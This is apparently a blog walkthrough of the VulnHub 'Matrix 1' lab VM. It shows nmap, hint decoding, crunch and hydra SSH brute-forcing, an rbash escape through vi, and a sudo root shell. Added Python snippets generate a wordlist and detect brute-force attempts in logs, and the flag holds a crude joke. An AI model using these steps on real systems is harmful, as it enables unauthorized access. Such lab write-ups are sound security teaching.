Sunday, November 17, 2019

VulnHub: Matrix 1 Walkthrough

Let's start off with an nmap scan of the remote host.

root@ubuntu:~/src# nmap -sC -sV -O -T5 192.168.56.103

Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-17 16:29 MST
Nmap scan report for wordy (192.168.56.103)
Host is up (0.00041s latency).
Not shown: 997 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 9c:8b:c7:7b:48:db:db:0c:4b:68:69:80:7b:12:4e:49 (RSA)
|   256 49:6c:23:38:fb:79:cb:e0:b3:fe:b2:f4:32:a2:70:8e (ECDSA)
|_  256 53:27:6f:04:ed:d1:e7:81:fb:00:98:54:e6:00:84:4a (EdDSA)
80/tcp    open  http    SimpleHTTPServer 0.6 (Python 2.7.14)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.14
|_http-title: Welcome in Matrix
31337/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.14)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.14
|_http-title: Welcome in Matrix
MAC Address: 08:00:27:E5:B2:AA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.23 seconds
root@ubuntu:~/src# 

Nmap came back with three open ports: 22, 80 and 31337. Two of these look like web servers, so let's visit the pages and see what they have to offer.

http://192.168.56.103:
http://192.168.56.103:31337

If we view the source of the website on port 31337 we find a base64-encoded string embedded in the page.

 class="service__text">ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=

The base64 decodes to:

root@ubuntu:~/src# echo ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg= | base64 -d
echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix
root@ubuntu:~/src# 

Cypher.matrix could be a user name or a file. Let's try it in the URL and see what happens.

http://192.168.56.103:31337/Cypher.matrix

+++++ ++++[ ->+++ +++++ +<]>+ +++++ ++.<+ +++[- >++++ <]>++ ++++. +++++
+.<++ +++++ ++[-> ----- ----< ]>--- -.<++ +++++ +[->+ +++++ ++<]> +++.-
-.<++ +[->+ ++<]> ++++. <++++ ++++[ ->--- ----- <]>-- ----- ----- --.<+
+++++ ++[-> +++++ +++<] >++++ +.+++ +++++ +.+++ +++.< +++[- >---< ]>---
---.< +++[- >+++< ]>+++ +.<++ +++++ ++[-> ----- ----< ]>-.< +++++ +++[-
>++++ ++++< ]>+++ +++++ +.+++ ++.++ ++++. ----- .<+++ +++++ [->-- -----
-<]>- ----- ----- ----. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ +.<++
+[->- --<]> ---.< ++++[ ->+++ +<]>+ ++.-- .---- ----- .<+++ [->++ +<]>+
+++++ .<+++ +++++ +[->- ----- ---<] >---- ---.< +++++ +++[- >++++ ++++<
]>+.< ++++[ ->+++ +<]>+ +.<++ +++++ ++[-> ----- ----< ]>--. <++++ ++++[
...

We get back a file written in brainfuck, so our next task is to run the program and turn its output into something readable. I went to this site to decode the file: https://www.splitbrain.org/_static/ook/

You can enter into matrix as guest, with password k1ll0rXX
Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.

We get another hint, this time on how to log in to the box, but first we have to generate a password list according to the hint. For that we will use the crunch wordlist utility.

root@ubuntu:~/src/crunch# ./crunch 8 8 -t k1ll0r%@ -o dict.txt
Crunch will now generate the following amount of data: 2340 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260 

crunch: 100% completed generating output
root@ubuntu:~/src/crunch# 
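The crunch pattern used above (% stands for a digit, @ for a lowercase letter) can be reproduced in a few lines. This added Python example, not from the original post or from crunch itself, expands the pattern and checks that it yields the 260 lines and 2340 bytes crunch reported; the symbol class (^) is left out because its default character set is not shown on this page.

```python
import itertools
import string

# Placeholder classes of crunch's -t option: @ lowercase, , uppercase, % digit.
# Any other character in the pattern is taken literally.
CRUNCH_CLASSES = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
}

def expand_pattern(pattern: str) -> list:
    """Expand a crunch -t pattern into every candidate password."""
    slots = [CRUNCH_CLASSES.get(ch, ch) for ch in pattern]
    return ["".join(combo) for combo in itertools.product(*slots)]

def wordlist_size(words) -> tuple:
    """(lines, bytes) of the list written one word per line plus newline,
    which is what crunch's 'amount of data' figure counts."""
    return len(words), sum(len(w.encode()) + 1 for w in words)

def write_wordlist(words, path: str) -> None:
    """Write the candidates the way crunch's -o does (one per line)."""
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(words) + "\n")

if __name__ == "__main__":
    words = expand_pattern("k1ll0r%@")      # the pattern given to crunch above
    print(wordlist_size(words))             # (260, 2340)
```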

Next we fire up hydra and start brute-forcing the SSH server with the user guest and the password list we just generated.

root@ubuntu:~/src/crunch# hydra -l guest -P /home/sam/src/crunch/dict.txt ssh://192.168.56.103
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2019-11-17 16:46:54
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 260 login tries (l:1/p:260), ~17 tries per task
[DATA] attacking ssh://192.168.56.103:22/
[22][ssh] host: 192.168.56.103   login: guest   password: k1ll0r7n
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2019-11-17 16:47:16
root@ubuntu:~/src/crunch# 
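From the defender's side a run like this is easy to spot in the target's sshd log: a burst of failed password attempts from one source, then a success. This added Python example (not from the original post; the log lines are constructed to resemble what the hydra run above would leave in a syslog-format auth.log) flags any source that exceeds a failure threshold within a time window, and any login from that source afterwards.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample of the sshd log a run like the one above would leave
# (syslog format; not captured from the box itself).
SAMPLE_LOG = """\
Nov 17 16:46:55 porteus sshd[2101]: Failed password for guest from 192.168.56.102 port 41230 ssh2
Nov 17 16:46:55 porteus sshd[2102]: Failed password for guest from 192.168.56.102 port 41231 ssh2
Nov 17 16:46:56 porteus sshd[2103]: Failed password for guest from 192.168.56.102 port 41232 ssh2
Nov 17 16:46:57 porteus sshd[2104]: Failed password for guest from 192.168.56.102 port 41233 ssh2
Nov 17 16:46:58 porteus sshd[2105]: Failed password for guest from 192.168.56.102 port 41234 ssh2
Nov 17 16:47:10 porteus sshd[2140]: Accepted password for guest from 192.168.56.102 port 41290 ssh2
Nov 17 16:50:00 porteus sshd[2200]: Accepted publickey for trinity from 192.168.56.1 port 50000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)

def detect_bruteforce(log: str, threshold: int = 5, window_s: int = 60, year: int = 2019) -> list:
    """Return (kind, ip, user, failures) findings: a 'bruteforce' entry when a source
    reaches `threshold` failures inside `window_s` seconds, then a
    'success_after_bruteforce' entry for every later successful login from it."""
    recent = defaultdict(deque)          # ip -> timestamps of failures in the window
    flagged, findings = set(), []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                     # not an auth result line
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        ip, user, result = m["ip"], m["user"], m["result"]
        if result == "Failed":
            q = recent[ip]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_s:
                q.popleft()              # drop failures outside the window
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                findings.append(("bruteforce", ip, user, len(q)))
        elif ip in flagged:
            findings.append(("success_after_bruteforce", ip, user, 0))
    return findings
```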

We found the password for the user 'guest'. Now let's log in to the SSH server and get a system shell.

root@ubuntu:~/src/crunch# ssh guest@192.168.56.103
The authenticity of host '192.168.56.103 (192.168.56.103)' can't be established.
ECDSA key fingerprint is SHA256:BMhLOBAe8UBwzvDNexM7vC3gv9ytO1L8etgkkIL8Ipk.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.103' (ECDSA) to the list of known hosts.
guest@192.168.56.103's password: 
Last login: Mon Aug  6 16:25:44 2018 from 192.168.56.102
guest@porteus:~$ 

We logged in successfully, but when we try to run commands we see that we are in a restricted bash (rbash) environment.

guest@porteus:~$ pwd
/home/guest
guest@porteus:~$ ls -la
-rbash: /bin/ls: restricted: cannot specify `/' in command names
guest@porteus:~$ 

One way to break out of rbash is to run vi and, from within vi, issue :!/bin/bash to spawn a normal bash shell.

vi
:!/bin/bash

Once we execute the vi instructions we see that we can change directories and run commands.

guest@porteus:~$ cd /home
guest@porteus:/home$ ls
guest/  trinity/
guest@porteus:/home$ 

If we check the sudo rights for the user guest we get back interesting results.

guest@porteus:~$ sudo -l
User guest may run the following commands on porteus:
    (ALL) ALL
    (root) NOPASSWD: /usr/lib64/xfce4/session/xfsm-shutdown-helper
    (trinity) NOPASSWD: /bin/cp
guest@porteus:~$ 

guest can run all programs via sudo, but the shell we spawned still carries rbash's environment, so before we can use sudo su we first need to set up our new unrestricted shell with the SHELL and PATH variables.

guest@porteus:/home$ export SHELL=/bin/bash:$SHELL
guest@porteus:/home$ export PATH=/usr/bin:$PATH
guest@porteus:/home$ export PATH=/bin:$PATH

After setting up the shell we can run 'sudo su' to gain a root shell.

guest@porteus:~$ sudo su

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

Password: 
root@porteus:/home/guest# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
root@porteus:/home/guest# whoami
root
root@porteus:/home/guest# 

Now that we have root we can cd to /root and cat flag.txt.

root@porteus:/home/guest# cd /root
root@porteus:~# ls -la
total 74
drwx------ 16 root root 4096 Aug 14  2018 ./
drwxr-xr-x 51 root root 4096 Aug  6  2018 ../
-rw-------  1 root root   52 Aug 14  2018 .Xauthority
-rw-------  1 root root 6187 Nov 18 00:05 .bash_history
-rw-r--r--  1 root root   79 Mar  5  2017 .bash_profile
-rw-r--r--  1 root root 1184 Apr 22  2018 .bashrc
drwx------  5 root root 4096 Aug  6  2018 .cache/
drwxr-xr-x 21 root root 4096 Aug 13  2018 .config/
drwx------  3 root root 4096 Aug  6  2018 .dbus/
-rw-------  1 root root   16 Aug  6  2018 .esd_auth
drwx------  4 root root 4096 Aug  6  2018 .thumbnails/
drwxr-xr-x  2 root root 4096 Aug  6  2018 Desktop/
drwxr-xr-x  2 root root 4096 Aug  6  2018 Documents/
drwxr-xr-x  2 root root 4096 Aug  6  2018 Downloads/
drwxr-xr-x  2 root root 4096 Aug  6  2018 Music/
drwxr-xr-x  2 root root 4096 Aug  6  2018 Pictures/
drwxr-xr-x  2 root root 4096 Aug  6  2018 Public/
drwxr-xr-x  2 root root 4096 Aug  6  2018 Videos/
-rw-r--r--  1 root root  691 Aug 14  2018 flag.txt
root@porteus:~# cat flag.txt
   _,-.                                                             
,-'  _|                  EVER REWIND OVER AND OVER AGAIN THROUGH THE
|_,-O__`-._              INITIAL AGENT SMITH/NEO INTERROGATION SCENE
|`-._\`.__ `_.           IN THE MATRIX AND BEAT OFF                 
|`-._`-.\,-'_|  _,-'.                                               
     `-.|.-' | |`.-'|_     WHAT                                     
        |      |_|,-'_`.                                            
              |-._,-'  |     NO, ME NEITHER                         
         jrei | |    _,'                                            
              '-|_,-'          IT'S JUST A HYPOTHETICAL QUESTION    

root@porteus:~# 
